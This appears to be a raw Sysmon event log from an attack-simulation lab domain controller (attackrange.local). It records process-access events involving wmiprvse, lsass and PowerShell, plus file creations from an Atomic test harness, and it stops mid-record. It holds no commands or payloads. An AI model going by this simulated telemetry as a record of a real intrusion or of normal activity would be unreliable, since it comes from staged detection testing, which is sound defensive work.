15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000022710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDownloads2021-01-20 15:59:14.148{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta2021-01-20 15:44:17.216 11241100x800000000000000022709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.117{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qwo4kigy.sdc.ps12021-01-20 15:59:14.117 10341000x800000000000000022708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.101{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.101{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.101{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.070{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.070{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.070{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.070{7901BC46-5352-6008-2A06-00000000A301}13241196C:\Windows\system32\conhost.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 